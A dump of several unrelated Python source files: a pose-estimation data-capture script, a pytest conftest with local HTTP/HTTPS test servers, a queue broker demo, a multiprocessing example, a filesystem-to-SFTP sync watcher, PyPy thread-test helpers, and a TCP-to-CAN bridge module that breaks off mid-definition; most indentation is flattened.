for i in range(int(groupNumber)):
imageSetBad.append([])
for i in range(int(groupNumber)):
dataSet.append([])
# label for good moves:0 / bad moves: 1
labelSet=[]
for i in range(int(groupNumber)):
labelSet.append([])
body = []
timeRatio = []
#process time of pose estimation with current setting is about 0.125 sec/frame
#frameLimit = int(round(recording_time/0.125))
#print('Limit of frame number is:' + str(frameLimit))
#Target exercises:In situ high knee / wood chop / Plank*40Sec
print(exerciseName +', left *1 right *1 ,recording time=' + str(recording_time) + 'Secs')
for i in range(goodSampleSize):
captureImage(0,recording_time,recording_interval,vs,imageSetGood)
for i in range(badSampleSize):
captureImage(1, recording_time, recording_interval, vs, imageSetBad)
for i in range(int(groupNumber)):
print('processing Good Sample of group number:' +str(i))
for image in imageSetGood[i]:
temp = []
imageC = image.copy()
humans = e.inference(imageC, resize_to_default=(w > 0 and h > 0), upsample_size=args.resize_out_ratio)
#print(humans)
            if len(humans) == 1:
for human in humans:
for j in range(common.CocoPart.Background.value):
if j not in human.body_parts.keys():
temp.append(0.0)
temp.append(0.0)
continue
body_part = human.body_parts[j]
coord = [body_part.x, body_part.y]
temp.append(coord[0])
temp.append(coord[1])
dataSet[i].append(temp)
labelSet[i].append(0)
#imageC = TfPoseEstimator.draw_humans(imageC, humans, imgcopy=False)
#cv2.imshow("process result", imageC)
imageC = None
#cv2.waitKey(5)
for i in range(int(groupNumber)):
print('processing Bad sample of group number:' + str(i))
for image in imageSetBad[i]:
temp = []
imageC = image.copy()
humans = e.inference(imageC, resize_to_default=(w > 0 and h > 0), upsample_size=args.resize_out_ratio)
#print(humans)
            if len(humans) == 1:
for human in humans:
for j in range(common.CocoPart.Background.value):
if j not in human.body_parts.keys():
temp.append(0.0)
temp.append(0.0)
continue
body_part = human.body_parts[j]
coord = [body_part.x, body_part.y]
temp.append(coord[0])
temp.append(coord[1])
dataSet[i].append(temp)
labelSet[i].append(1)
#imageC = TfPoseEstimator.draw_humans(imageC, humans, imgcopy=False)
#cv2.imshow("process result", imageC)
imageC = None
#cv2.waitKey(5)
#Free memory space for better processing speed
del imageSetGood
del imageSetBad
print('image set flushed!!')
#Restart imageSets
imageSetGood = []
imageSetBad = []
for i in range(int(groupNumber)):
imageSetGood.append([])
for i in range(int(groupNumber)):
imageSetBad.append([])
print(exerciseName+', left *1 right *1 ,recording time=' + str(recording_time) + 'Secs')
for i in range(goodSampleSize):
captureImage(0, recording_time, recording_interval, vs, imageSetGood)
for i in range(badSampleSize):
captureImage(1, recording_time, recording_interval, vs, imageSetBad)
for i in range(int(groupNumber)):
print('processing Good Sample of group number:' + str(i))
for image in imageSetGood[i]:
temp = []
imageC = image.copy()
humans = e.inference(imageC, resize_to_default=(w > 0 and h > 0), upsample_size=args.resize_out_ratio)
#print(humans)
            if len(humans) == 1:
for human in humans:
for j in range(common.CocoPart.Background.value):
if j not in human.body_parts.keys():
temp.append(0.0)
temp.append(0.0)
continue
body_part = human.body_parts[j]
coord = [body_part.x, body_part.y]
temp.append(coord[0])
temp.append(coord[1])
dataSet[i].append(temp)
labelSet[i].append(0)
# imageC = TfPoseEstimator.draw_humans(imageC, humans, imgcopy=False)
# cv2.imshow("process result", imageC)
imageC = None
# cv2.waitKey(5)
for i in range(int(groupNumber)):
print('processing Bad sample of group number:' + str(i))
for image in imageSetBad[i]:
temp = []
imageC = image.copy()
humans = e.inference(imageC, resize_to_default=(w > 0 and h > 0), upsample_size=args.resize_out_ratio)
#print(humans)
            if len(humans) == 1:
for human in humans:
for j in range(common.CocoPart.Background.value):
if j not in human.body_parts.keys():
temp.append(0.0)
temp.append(0.0)
continue
body_part = human.body_parts[j]
coord = [body_part.x, body_part.y]
temp.append(coord[0])
temp.append(coord[1])
dataSet[i].append(temp)
labelSet[i].append(1)
# imageC = TfPoseEstimator.draw_humans(imageC, humans, imgcopy=False)
# cv2.imshow("process result", imageC)
imageC = None
# cv2.waitKey(5)
# Free memory space for better processing speed
del imageSetGood
del imageSetBad
print('image set flushed!!')
# Restart imageSets
imageSetGood = []
imageSetBad = []
for i in range(int(groupNumber)):
imageSetGood.append([])
for i in range(int(groupNumber)):
imageSetBad.append([])
print(exerciseName+', left *1 right *1 ,recording time=' + str(recording_time) + 'Secs')
for i in range(goodSampleSize):
captureImage(0, recording_time, recording_interval, vs, imageSetGood)
for i in range(badSampleSize):
captureImage(1, recording_time, recording_interval, vs, imageSetBad)
for i in range(int(groupNumber)):
print('processing Good Sample of group number:' + str(i))
for image in imageSetGood[i]:
temp = []
imageC = image.copy()
humans = e.inference(imageC, resize_to_default=(w > 0 and h > 0), upsample_size=args.resize_out_ratio)
# print(humans)
            if len(humans) == 1:
for human in humans:
for j in range(common.CocoPart.Background.value):
if j not in human.body_parts.keys():
temp.append(0.0)
temp.append(0.0)
continue
body_part = human.body_parts[j]
coord = [body_part.x, body_part.y]
temp.append(coord[0])
temp.append(coord[1])
dataSet[i].append(temp)
labelSet[i].append(0)
# imageC = TfPoseEstimator.draw_humans(imageC, humans, imgcopy=False)
# cv2.imshow("process result", imageC)
imageC = None
# cv2.waitKey(5)
for i in range(int(groupNumber)):
print('processing Bad sample of group number:' + str(i))
for image in imageSetBad[i]:
temp = []
imageC = image.copy()
humans = e.inference(imageC, resize_to_default=(w > 0 and h > 0), upsample_size=args.resize_out_ratio)
# print(humans)
            if len(humans) == 1:
for human in humans:
for j in range(common.CocoPart.Background.value):
if j not in human.body_parts.keys():
temp.append(0.0)
temp.append(0.0)
continue
body_part = human.body_parts[j]
coord = [body_part.x, body_part.y]
temp.append(coord[0])
temp.append(coord[1])
dataSet[i].append(temp)
labelSet[i].append(1)
# imageC = TfPoseEstimator.draw_humans(imageC, humans, imgcopy=False)
# cv2.imshow("process result", imageC)
imageC = None
# cv2.waitKey(5)
print(dataSet)
print(labelSet)
print(np.shape(dataSet))
print(np.shape(labelSet))
output = open( exerciseName+'Data3.pkl', 'wb')
pickle.dump(dataSet, output)
output.close()
output = open(exerciseName+'Label3.pkl', 'wb')
pickle.dump(labelSet, output)
output.close()
pkl_file = open(exerciseName+'Data3.pkl', 'rb')
highKneeData = pickle.load(pkl_file)
pkl_file.close()
print(highKneeData)
pkl_file = open(exerciseName + 'Label3.pkl', 'rb')
highKneeLabel = pickle.load(pkl_file)
pkl_file.close()
print(highKneeLabel)
cv2.destroyAllWindows()
vs.stop()
|
conftest.py
|
import asyncio
import json
import os
import threading
import time
import typing
import pytest
import trustme
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.serialization import (
BestAvailableEncryption,
Encoding,
PrivateFormat,
load_pem_private_key,
)
from uvicorn.config import Config
from uvicorn.main import Server
from httpx import URL
from tests.concurrency import sleep
ENVIRONMENT_VARIABLES = {
"SSL_CERT_FILE",
"SSL_CERT_DIR",
"HTTP_PROXY",
"HTTPS_PROXY",
"ALL_PROXY",
"NO_PROXY",
"SSLKEYLOGFILE",
}
@pytest.fixture(
params=[
pytest.param("asyncio", marks=pytest.mark.asyncio),
pytest.param("trio", marks=pytest.mark.trio),
]
)
def async_environment(request: typing.Any) -> str:
"""
Mark a test function to be run on both asyncio and trio.
Equivalent to having a pair of tests, each respectively marked with
'@pytest.mark.asyncio' and '@pytest.mark.trio'.
Intended usage:
```
@pytest.mark.usefixtures("async_environment")
async def my_async_test():
...
```
"""
return request.param
@pytest.fixture(scope="function", autouse=True)
def clean_environ() -> typing.Iterator[None]:
"""Keeps os.environ clean for every test without having to mock os.environ"""
original_environ = os.environ.copy()
os.environ.clear()
os.environ.update(
{
k: v
for k, v in original_environ.items()
if k not in ENVIRONMENT_VARIABLES and k.lower() not in ENVIRONMENT_VARIABLES
}
)
yield
os.environ.clear()
os.environ.update(original_environ)
async def app(scope, receive, send):
assert scope["type"] == "http"
if scope["path"].startswith("/slow_response"):
await slow_response(scope, receive, send)
elif scope["path"].startswith("/premature_close"):
await premature_close(scope, receive, send)
elif scope["path"].startswith("/status"):
await status_code(scope, receive, send)
elif scope["path"].startswith("/echo_body"):
await echo_body(scope, receive, send)
elif scope["path"].startswith("/echo_headers"):
await echo_headers(scope, receive, send)
elif scope["path"].startswith("/redirect_301"):
await redirect_301(scope, receive, send)
else:
await hello_world(scope, receive, send)
async def hello_world(scope, receive, send):
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def slow_response(scope, receive, send):
await sleep(1.0)
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def premature_close(scope, receive, send):
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
async def status_code(scope, receive, send):
status_code = int(scope["path"].replace("/status/", ""))
await send(
{
"type": "http.response.start",
"status": status_code,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def echo_body(scope, receive, send):
body = b""
more_body = True
while more_body:
message = await receive()
body += message.get("body", b"")
more_body = message.get("more_body", False)
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": body})
async def echo_headers(scope, receive, send):
body = {}
for name, value in scope.get("headers", []):
body[name.capitalize().decode()] = value.decode()
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"application/json"]],
}
)
await send({"type": "http.response.body", "body": json.dumps(body).encode()})
async def redirect_301(scope, receive, send):
await send(
{"type": "http.response.start", "status": 301, "headers": [[b"location", b"/"]]}
)
await send({"type": "http.response.body"})
SERVER_SCOPE = "session"
@pytest.fixture(scope=SERVER_SCOPE)
def cert_authority():
return trustme.CA()
@pytest.fixture(scope=SERVER_SCOPE)
def ca_cert_pem_file(cert_authority):
with cert_authority.cert_pem.tempfile() as tmp:
yield tmp
@pytest.fixture(scope=SERVER_SCOPE)
def localhost_cert(cert_authority):
return cert_authority.issue_cert("localhost")
@pytest.fixture(scope=SERVER_SCOPE)
def cert_pem_file(localhost_cert):
with localhost_cert.cert_chain_pems[0].tempfile() as tmp:
yield tmp
@pytest.fixture(scope=SERVER_SCOPE)
def cert_private_key_file(localhost_cert):
with localhost_cert.private_key_pem.tempfile() as tmp:
yield tmp
@pytest.fixture(scope=SERVER_SCOPE)
def cert_encrypted_private_key_file(localhost_cert):
# Deserialize the private key and then reserialize with a password
private_key = load_pem_private_key(
localhost_cert.private_key_pem.bytes(), password=None, backend=default_backend()
)
encrypted_private_key_pem = trustme.Blob(
private_key.private_bytes(
Encoding.PEM,
PrivateFormat.TraditionalOpenSSL,
BestAvailableEncryption(password=b"password"),
)
)
with encrypted_private_key_pem.tempfile() as tmp:
yield tmp
class TestServer(Server):
@property
def url(self) -> URL:
protocol = "https" if self.config.is_ssl else "http"
return URL(f"{protocol}://{self.config.host}:{self.config.port}/")
def install_signal_handlers(self) -> None:
# Disable the default installation of handlers for signals such as SIGTERM,
# because it can only be done in the main thread.
pass
async def serve(self, sockets=None):
self.restart_requested = asyncio.Event()
loop = asyncio.get_event_loop()
tasks = {
loop.create_task(super().serve(sockets=sockets)),
loop.create_task(self.watch_restarts()),
}
await asyncio.wait(tasks)
async def restart(self) -> None:
# This coroutine may be called from a different thread than the one the
# server is running on, and from an async environment that's not asyncio.
# For this reason, we use an event to coordinate with the server
# instead of calling shutdown()/startup() directly, and should not make
# any asyncio-specific operations.
self.started = False
self.restart_requested.set()
while not self.started:
await sleep(0.2)
async def watch_restarts(self):
while True:
if self.should_exit:
return
try:
await asyncio.wait_for(self.restart_requested.wait(), timeout=0.1)
except asyncio.TimeoutError:
continue
self.restart_requested.clear()
await self.shutdown()
await self.startup()
def serve_in_thread(server: Server):
thread = threading.Thread(target=server.run)
thread.start()
try:
while not server.started:
time.sleep(1e-3)
yield server
finally:
server.should_exit = True
thread.join()
@pytest.fixture(scope=SERVER_SCOPE)
def server():
config = Config(app=app, lifespan="off", loop="asyncio")
server = TestServer(config=config)
yield from serve_in_thread(server)
@pytest.fixture(scope=SERVER_SCOPE)
def https_server(cert_pem_file, cert_private_key_file):
config = Config(
app=app,
lifespan="off",
ssl_certfile=cert_pem_file,
ssl_keyfile=cert_private_key_file,
host="localhost",
port=8001,
loop="asyncio",
)
server = TestServer(config=config)
yield from serve_in_thread(server)
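# Illustrative usage sketch (not part of the fixtures above): a test module can
# combine the "server" and "async_environment" fixtures roughly like this,
# assuming httpx.AsyncClient is available in the test environment:
#
#     @pytest.mark.usefixtures("async_environment")
#     async def test_hello_world(server):
#         async with httpx.AsyncClient() as client:
#             response = await client.get(server.url)
#         assert response.status_code == 200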
|
BrokerDemo.py
|
# (C) Copyright 2021 ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation
# nor does it submit to any jurisdiction.
#
import os
import random
import threading
import time
from queueos import Broker, Environment, FunctionFactory, Request
# This demo simulates a random workload, turn on and off the
# availability of adaptors, and change the number of workers. The QoS
# rules are expressed in the file 'broker.rules' in the same directory.
USERS = ["alice", "bob", "carlos", "david", "erin", "frank"]
DATASETS = ["dataset-1", "dataset-2", "dataset-3"]
ADAPTORS = ["adaptor1", "adaptor2"]
environment = Environment()
FunctionFactory.register_function(
"dataset",
lambda context, *args: context.request.dataset,
)
FunctionFactory.register_function(
"adaptor",
lambda context, *args: context.request.adaptor,
)
class DemoRequest(Request):
def __init__(self, user, dataset, adaptor):
super().__init__()
self.user = user
self.dataset = dataset
self.adaptor = adaptor
self.cost = (0, 0)
def execute(self):
sleep = random.randint(0, 20)
print(self, f"Running for {sleep} seconds")
time.sleep(sleep)
if random.randint(1, 10) == 1:
raise Exception(f"{self} failed!!")
def __repr__(self):
return f"R-{self.id}-{self.user}-{self.dataset}-{self.adaptor}"
broker = Broker(
os.path.join(os.path.dirname(__file__), "broker.rules"),
4,
environment,
)
RUN_UPDATE = True
def update_config():
while broker.known_requests:
time.sleep(20)
adaptor = "adaptor1" if random.randint(0, 1) else "adaptor2"
if random.randint(0, 1):
environment.enable_resource(adaptor)
else:
environment.disable_resource(adaptor)
broker.set_number_of_workers(random.randint(0, 5))
print("----------------------")
broker.status()
print("----------------------")
broker.pause()
for j in range(40):
broker.enqueue(
DemoRequest(
user=random.choice(USERS),
dataset=random.choice(DATASETS),
adaptor=random.choice(ADAPTORS),
)
)
threading.Thread(target=update_config, daemon=True).start()
broker.resume()
print("END OF WORK - FLUSHING")
broker.shutdown()
print("THE END")
|
parallel-mp.py
|
import multiprocessing as mp
import time
def task(i):
print("sleeping ",i)
time.sleep(3)
print("awakening ",i)
if __name__ == '__main__':
jobs = []
for i in range(4):
p = mp.Process(target=task,args=[i])
p.start()
jobs.append(p)
for p in jobs:
p.join()
|
watch_sync.py
|
import logging
import os
import queue
import threading
from datetime import datetime
import watchdog.events
import watchdog.observers
from . import path_match
from .file_trees import compare_file_trees, get_remote_mtime
from .models import ChangeEventType, FsChangeEvent
from .pubsub import Messages
class TimestampDatabase(object):
def __init__(self, initial_data=None):
"""
Keep track of paths and timestamps associated with those paths.
Not thread-safe
"""
if initial_data is None:
self._data = {}
else:
self._data = initial_data
def __str__(self):
return str(self._data)
def get(self, path, default=datetime.min):
return self._data.get(path, default)
def remove(self, path):
try:
del self._data[path]
except KeyError:
logging.info(
"Path {} did not exist in timestamp database".format(path)
)
def _was_modified_since(self, path, timestamp):
current_timestamp = self._data.get(path, datetime.min)
return current_timestamp > timestamp
def update_if_newer(self, path, timestamp):
if not self._was_modified_since(path, timestamp):
self._data[path] = timestamp
@classmethod
def from_fs_objects(cls, fs_objects):
_data = {}
for fs_object in fs_objects:
last_modified = fs_object.attrs.last_modified
_data[fs_object.path] = last_modified
return cls(_data)
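# Minimal behaviour sketch for TimestampDatabase (hypothetical values): the
# database only moves a path's timestamp forward, so stale updates are ignored.
#
#     db = TimestampDatabase()
#     db.update_if_newer("notes.txt", datetime(2021, 1, 2))
#     db.update_if_newer("notes.txt", datetime(2020, 1, 1))  # older: ignored
#     assert db.get("notes.txt") == datetime(2021, 1, 2)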
class ListableQueue(queue.Queue):
def items(self):
return [item for item in self.queue]
class FileSystemChangeHandler(watchdog.events.FileSystemEventHandler):
watchdog_event_lookup = {
watchdog.events.EVENT_TYPE_CREATED: ChangeEventType.CREATED,
watchdog.events.EVENT_TYPE_MOVED: ChangeEventType.MOVED,
watchdog.events.EVENT_TYPE_MODIFIED: ChangeEventType.MODIFIED,
watchdog.events.EVENT_TYPE_DELETED: ChangeEventType.DELETED,
}
def __init__(self, queue, local_dir, excluded_patterns):
self.queue = queue
self.local_dir = local_dir
self._excluded_patterns = excluded_patterns
def on_any_event(self, watchdog_event):
logging.info("Registered filesystem event {}".format(watchdog_event))
event_type = self.watchdog_event_lookup[watchdog_event.event_type]
is_directory = watchdog_event.is_directory
path = self._relpath(watchdog_event.src_path)
if path_match.matches_any_of(path, self._excluded_patterns):
logging.info(
"Ignoring change event {} as it is in list of excluded patterns.".format(
watchdog_event
)
)
elif event_type == ChangeEventType.MODIFIED and is_directory:
# Ignore directory mtime changes
pass
else:
if event_type == ChangeEventType.MOVED:
dest_path = watchdog_event.dest_path
abs_local_dir = os.path.abspath(self.local_dir)
if os.path.abspath(dest_path).startswith(abs_local_dir):
event = FsChangeEvent(
event_type,
is_directory,
path,
extra_args={"dest_path": self._relpath(dest_path)},
)
else:
# File was moved outside of the area we're watching:
# treat as deletion
event = FsChangeEvent(
ChangeEventType.DELETED,
is_directory,
path,
extra_args=None,
)
else:
event = FsChangeEvent(
event_type, is_directory, path, extra_args=None
)
self.queue.put(event)
def _relpath(self, path):
return os.path.relpath(path, start=self.local_dir)
class Uploader(object):
def __init__(self, queue, synchronizer, monitor, exchange):
self._queue = queue
self._synchronizer = synchronizer
self._stop_event = threading.Event()
self._monitor = monitor
self._thread = None
self._exchange = exchange
def stop(self):
self._stop_event.set()
def start(self):
def run():
while not self._stop_event.is_set():
try:
fs_event = self._queue.get(timeout=1)
except queue.Empty:
continue
if self._monitor.should_sync(fs_event):
try:
self._handle_sync(fs_event)
self._monitor.has_synced(fs_event)
except Exception as exc:
logging.exception(exc)
self._exchange.publish(
Messages.ERROR_HANDLING_FS_EVENT
)
self._thread = threading.Thread(target=run)
self._thread.start()
def _handle_sync(self, fs_event):
logging.info("Processing file system event {}".format(fs_event))
self._exchange.publish(Messages.STARTING_HANDLING_FS_EVENT, fs_event)
if fs_event.is_directory:
# TODO implement directory handling
if fs_event.event_type in {
ChangeEventType.CREATED,
ChangeEventType.MODIFIED,
}:
self._synchronizer.mkdir_remote(fs_event.path)
elif fs_event.event_type == ChangeEventType.DELETED:
self._synchronizer.rmdir_remote(fs_event.path)
elif fs_event.event_type == ChangeEventType.MOVED:
self._synchronizer.mvfile_remote(
fs_event.path, fs_event.extra_args["dest_path"]
)
else:
path = fs_event.path
if fs_event.event_type in {
ChangeEventType.CREATED,
ChangeEventType.MODIFIED,
}:
self._synchronizer.up(path)
elif fs_event.event_type == ChangeEventType.DELETED:
self._synchronizer.rmfile_remote(path)
elif fs_event.event_type == ChangeEventType.MOVED:
self._synchronizer.mvfile_remote(
path, fs_event.extra_args["dest_path"]
)
self._exchange.publish(Messages.FINISHED_HANDLING_FS_EVENT, fs_event)
def join(self):
if self._thread is not None:
self._thread.join()
class HeldFilesMonitor(object):
def __init__(self, synchronizer, sftp, exchange):
self._synchronizer = synchronizer
self._local_dir = synchronizer.local_dir
self._remote_dir = synchronizer.remote_dir
self._sftp = sftp
self._exchange = exchange
_local_tree = self._synchronizer.list_local()
_remote_tree = self._synchronizer.list_remote()
self._local_timestamps = TimestampDatabase.from_fs_objects(_local_tree)
self._remote_timestamps = TimestampDatabase.from_fs_objects(
_remote_tree
)
self._held_paths = set(
            self._get_initial_held_paths(_local_tree, _remote_tree)
)
self._exchange.publish(
Messages.HELD_FILES_CHANGED, frozenset(self._held_paths)
)
    def _get_initial_held_paths(self, local_tree, remote_tree):
for difference in compare_file_trees(local_tree, remote_tree):
if difference[0] in {"RIGHT_ONLY", "TYPE_DIFFERENT"}:
yield difference[1].path
elif difference[0] == "ATTRS_DIFFERENT":
local_mtime = difference[1].attrs.last_modified
remote_mtime = difference[2].attrs.last_modified
if remote_mtime > local_mtime:
# Hold only if remote file was modified after current
yield difference[1].path
def should_sync(self, fs_event):
path = fs_event.path
if path in self._held_paths:
return False
else:
if fs_event.event_type == ChangeEventType.MOVED:
dest_path = fs_event.extra_args["dest_path"]
if self._has_path_changed(path):
self._add_to_held_paths(path)
src_path_unchanged = False
else:
src_path_unchanged = True
if self._has_path_changed(dest_path):
self._add_to_held_paths(dest_path)
dest_path_unchanged = False
else:
dest_path_unchanged = True
return src_path_unchanged and dest_path_unchanged
else:
if self._has_path_changed(path):
self._add_to_held_paths(path)
return False
else:
return True
def _has_path_changed(self, path):
last_known_timestamp = self._remote_timestamps.get(path)
try:
current_timestamp = get_remote_mtime(
os.path.join(self._remote_dir, path), self._sftp
)
has_changed = last_known_timestamp != current_timestamp
return has_changed
except FileNotFoundError:
return False
def _add_to_held_paths(self, path):
self._held_paths.add(path)
self._exchange.publish(
Messages.HELD_FILES_CHANGED, frozenset(self._held_paths)
)
def has_synced(self, fs_event):
if fs_event.event_type == ChangeEventType.DELETED:
self._remote_timestamps.remove(fs_event.path)
elif fs_event.event_type == ChangeEventType.MOVED:
self._remote_timestamps.remove(fs_event.path)
dest_path = fs_event.extra_args["dest_path"]
abs_dest_path = os.path.join(self._remote_dir, dest_path)
current_timestamp = get_remote_mtime(abs_dest_path, self._sftp)
self._remote_timestamps.update_if_newer(
dest_path, current_timestamp
)
else:
path = fs_event.path
current_timestamp = get_remote_mtime(
os.path.join(self._remote_dir, path), self._sftp
)
self._remote_timestamps.update_if_newer(path, current_timestamp)
class WatcherSynchronizer(object):
def __init__(self, sftp, synchronizer, exchange):
local_dir = synchronizer.local_dir
self.queue = ListableQueue()
self.observer = watchdog.observers.Observer()
self._exchange = exchange
monitor = HeldFilesMonitor(synchronizer, sftp, exchange)
self.observer.schedule(
FileSystemChangeHandler(
self.queue, local_dir, synchronizer.ignore_paths
),
local_dir,
recursive=True,
)
self.uploader = Uploader(self.queue, synchronizer, monitor, exchange)
def start(self):
self._exchange.publish(Messages.START_WATCH_SYNC_MAIN_LOOP)
self.observer.start()
self.uploader.start()
def stop(self):
self.observer.stop()
self.uploader.stop()
def join(self):
self.observer.join()
self.uploader.join()
|
support.py
|
import gc
import time
import thread
import os
import errno
from pypy.interpreter.gateway import interp2app, unwrap_spec
from pypy.module.thread import gil
NORMAL_TIMEOUT = 300.0 # 5 minutes
def waitfor(space, w_condition, delay=1):
adaptivedelay = 0.04
limit = time.time() + delay * NORMAL_TIMEOUT
while time.time() <= limit:
gil.before_external_call()
time.sleep(adaptivedelay)
gil.after_external_call()
gc.collect()
if space.is_true(space.call_function(w_condition)):
return
adaptivedelay *= 1.05
print '*** timed out ***'
def timeout_killer(cls, pid, delay):
def kill():
for x in range(delay * 10):
time.sleep(0.1)
try:
os.kill(pid, 0)
except OSError as e:
if e.errno == errno.ESRCH: # no such process
return
raise
os.kill(pid, 9)
print("process %s killed!" % (pid,))
import threading
threading.Thread(target=kill).start()
class GenericTestThread:
spaceconfig = dict(usemodules=('thread', 'time', 'signal'))
def setup_class(cls):
cls.w_runappdirect = cls.space.wrap(cls.runappdirect)
if cls.runappdirect:
cls.w_NORMAL_TIMEOUT = NORMAL_TIMEOUT
def plain_waitfor(cls, condition, delay=1):
import gc
import time
adaptivedelay = 0.04
limit = time.time() + cls.NORMAL_TIMEOUT * delay
while time.time() <= limit:
time.sleep(adaptivedelay)
gc.collect()
if condition():
return
adaptivedelay *= 1.05
print('*** timed out ***')
cls.w_waitfor = plain_waitfor
cls.w_timeout_killer = timeout_killer
else:
@unwrap_spec(delay=int)
def py_waitfor(space, w_condition, delay=1):
waitfor(space, w_condition, delay)
cls.w_waitfor = cls.space.wrap(interp2app(py_waitfor))
def py_timeout_killer(space, __args__):
args_w, kwargs_w = __args__.unpack()
args = map(space.unwrap, args_w)
kwargs = dict([
(k, space.unwrap(v))
for k, v in kwargs_w.iteritems()
])
timeout_killer(cls, *args, **kwargs)
cls.w_timeout_killer = cls.space.wrap(interp2app(py_timeout_killer))
cls.w_busywait = cls.space.appexec([], """():
import time
return time.sleep
""")
|
hw_TCP2CAN.py
|
import time
import struct
import socket
import threading
import traceback
import socketserver
from cantoolz.can import CANMessage
from cantoolz.module import CANModule, Command
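# Wire format as reconstructed from the handlers below (not from an external
# spec): each exchange starts with a 4-byte header b'c' + <type byte> +
# big-endian uint16 frame count, followed by <count> 16-byte records laid out
# as b'ct' + <type byte>, a 4-byte big-endian CAN id, a 1-byte length, and
# 8 data bytes padded with trailing zeros.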
class CustomTCPClient:
    def __init__(self, conn):
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.settimeout(5.0)
        self.socket.connect(conn)
        # Initialise the shared state before starting the handler thread, so
        # handle() never races against a half-constructed object. Note that
        # self.selfx (the owning module) is assigned by the caller right after
        # construction, before it is needed for error reporting.
        self.CANList_in = []
        self.CANList_out = []
        self._access_in = threading.Event()
        self._access_out = threading.Event()
        self._thread = threading.Thread(target=self.handle)
        self._thread.daemon = True
        self._thread.start()
def handle(self):
while True:
try:
self.socket.sendall(b'c\x01\x00\x00') # Request for frames
inc_header = self.socket.recv(4) # Get header first
if inc_header[0:2] != b'c\x02':
self.selfx.dprint(0, "HEADER ERROR")
self.selfx.set_error_text('HEADER ERROR')
continue
else:
ready = struct.unpack("!H", inc_header[2:4])[0]
inc_size = 16 * ready
if ready > 0:
inc_data = self.socket.recv(inc_size) # Get frames
idx = 0
while ready != 0:
packet = inc_data[idx:idx + 16]
if packet[0:3] != b'ct\x03':
self.selfx.dprint(0, 'CLIENT GOT INCORRECT DATA')
self.selfx.set_error_text('CLIENT GOT INCORRECT DATA')
break
else:
fid = struct.unpack("!I", packet[3:7])[0]
flen = packet[7]
fdata = packet[8:16]
while self._access_in.is_set():
time.sleep(0.0001)
self._access_in.set()
self.CANList_in.append(
CANMessage.init_data(int(fid), flen, fdata)
)
self._access_in.clear()
idx += 16
ready -= 1
while self._access_out.is_set():
time.sleep(0.0001)
self._access_out.set()
ready = len(self.CANList_out)
if ready > 0:
sz = struct.pack("!H", ready)
send_msg = b'c\x04' + sz
self.socket.sendall(send_msg)
send_msg = b''
for can_msg in self.CANList_out:
# 16 byte
send_msg += b'ct\x05' + (b'\x00' * (4 - len(can_msg.frame_raw_id))) + can_msg.frame_raw_id + can_msg.frame_raw_length + can_msg.frame_raw_data + (b'\x00' * (8 - can_msg.frame_length))
if ready > 0:
self.socket.sendall(send_msg)
self.CANList_out = []
self._access_out.clear()
except Exception as e:
self.selfx.set_error_text('TCPClient: recv response error:' + str(e))
traceback.print_exc()
def write_can(self, can_frame):
while self._access_out.is_set():
time.sleep(0.0001)
self._access_out.set()
self.CANList_out.append(can_frame)
self._access_out.clear()
def read_can(self):
if len(self.CANList_in) > 0:
while self._access_in.is_set():
time.sleep(0.0001)
self._access_in.set()
msg = self.CANList_in.pop(0)
self._access_in.clear()
return msg
else:
return None
    def close(self):
        # The handler thread is a daemon; closing the socket is enough to stop
        # traffic, and threading.Thread has no supported way to force-stop it.
        self.socket.close()
class CustomTCPServer(socketserver.TCPServer):
def __init__(self, server_address, RequestHandlerClass):
super().__init__(server_address, RequestHandlerClass)
self.CANList_in = []
self.CANList_out = []
self._access_in = threading.Event()
self._access_out = threading.Event()
self.socket.settimeout(5.0)
self.prt = ""
def write_can(self, can_frame):
while self._access_out.is_set():
time.sleep(0.0001)
self._access_out.set()
self.CANList_out.append(can_frame)
self._access_out.clear()
def read_can(self):
if len(self.CANList_in) > 0:
while self._access_in.is_set():
time.sleep(0.0001)
self._access_in.set()
msg = self.CANList_in.pop(0)
self._access_in.clear()
return msg
else:
return None
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
# self.request is the TCP socket connected to the client
print("TCP2CAN connected to " + str(self.server.prt))
self.server.selfx.set_error_text("TCP2CAN connected to " + str(self.server.prt))
self.server._access_in.clear()
self.server._access_out.clear()
while True:
# Get header first
data = self.request.recv(4)
if data[0:1] == b'c':
# Header
if data[1] == 1: # Request for frames
while self.server._access_out.is_set():
time.sleep(0.0001)
self.server._access_out.set()
ready = len(self.server.CANList_out)
sz = struct.pack("!H", ready)
send_msg = b'c\x02' + sz
self.request.sendall(send_msg)
send_msg = b''
for can_msg in self.server.CANList_out:
# 16 byte
send_msg += b'ct\x03' + (b'\x00' * (4 - len(can_msg.frame_raw_id))) + can_msg.frame_raw_id + can_msg.frame_raw_length + can_msg.frame_raw_data + (b'\x00' * (8 - can_msg.frame_length))
if ready > 0:
self.request.sendall(send_msg)
self.server.CANList_out = []
self.server._access_out.clear()
elif data[1] == 4: # Incoming frames...
ready = struct.unpack("!H", data[2:4])[0]
inc_size = 16 * ready
if ready > 0:
inc_data = self.request.recv(inc_size)
idx = 0
while ready != 0:
packet = inc_data[idx:idx + 16]
if packet[0:3] != b'ct\x05':
print('SERVER GOT INCORRECT DATA')
self.server.selfx.set_error_text('SERVER GOT INCORRECT DATA')
break
else:
fid = struct.unpack("!I", packet[3:7])[0]
flen = packet[7]
fdata = packet[8:16]
while self.server._access_in.is_set():
time.sleep(0.0001)
self.server._access_in.set()
self.server.CANList_in.append(
CANMessage.init_data(int(fid), flen, fdata)
)
self.server._access_in.clear()
idx += 16
ready -= 1
class hw_TCP2CAN(CANModule):
name = "TCP interface"
help = """
